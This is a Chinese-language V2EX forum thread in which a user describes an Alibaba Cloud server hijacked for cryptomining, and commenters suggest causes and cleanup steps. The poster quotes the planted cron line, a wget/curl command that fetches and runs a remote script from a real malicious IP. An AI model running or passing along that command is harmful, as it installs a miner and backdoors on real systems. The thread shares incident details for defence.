太可怕了，第一次碰到，阿里云服务器被人侵入用来挖矿了。。。。

logroate 进程在狂刷 cpu , 不知道是什么侵入的（这是最可怕的），太可恶了，可怕。。。。

bigxianyu

218 天前

然后阿里云告诉我说，你当前账号用的是免费版云安全中心，不支持病毒查杀。。。。

Canglin

218 天前

不过可以看是哪些进程，kill 掉后删除就好了，我也被弄过

Foxkeh

218 天前

只能检查下 SSH 和各种暴露到公网的弱密码, 安全组, 不明来源的软件或被爆出漏洞的第三方 Web 应用(尤其是用 root 权限运行的)

然后建议重装

tinyfry

218 天前

果断重装，不要开放一些不用的端口，密码强度要设置高一些，定期对组件进行升级。

bigxianyu

218 天前

@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) , 这是 cron 任务里被添加的东西

bigxianyu

218 天前

@Canglin 嗯，已经手动弄了，搜到了以前也有人被搞过

idragonet

218 天前

系统重新安装肯定的，SSH 只开启证书登录。

bigxianyu

218 天前

@bigxianyu 问下大佬们，IP 有举报功能吗，感觉可以有这个功能，

bigxianyu

218 天前

@bigxianyu 我要举报这个 ip ，找到对应的
@bigxianyu 185.196.8.123 我要举报这个 IP , 感觉有点神奇，好像这个 IP 发生过好久了，我在 google 搜索都搜到了好几篇文章

virusdefender

218 天前

据我经验，50% 是 ssh 弱口令，30% 是 redis 弱口令，20% 是各种其他漏洞。

Canglin

218 天前

@bigxianyu #6 你是不是用过那种公共的 docker 镜像啊？我之前弄过一个 Oracle 和 MySql ，就被挖矿了

1423

218 天前

就是因为你们这种人,国产服务和 APP 才肆无忌惮的以安全保护的名义查用户的数据

Pierro

218 天前

之前用 docker 远程部署镜像端口有漏洞就被挖矿了各种查定时文件什么的清了还是会自动执行就直接重装了

oneisall8955

218 天前

http://185.196.8.123/logservice.sh 这个文件做了好几个后门，systemd ，.bashrc ，cron ，都检查下

akira

217 天前

服务器直接作废重新开一台吧，然后好好做好安全

这是一个专为移动设备优化的页面（即为了让你能够在 Google 搜索结果里秒开这个页面），如果你希望参与 V2EX 社区的讨论，你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/1045890

V2EX 是创意工作者们的社区，是一个分享自己正在做的有趣事物、交流想法，可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.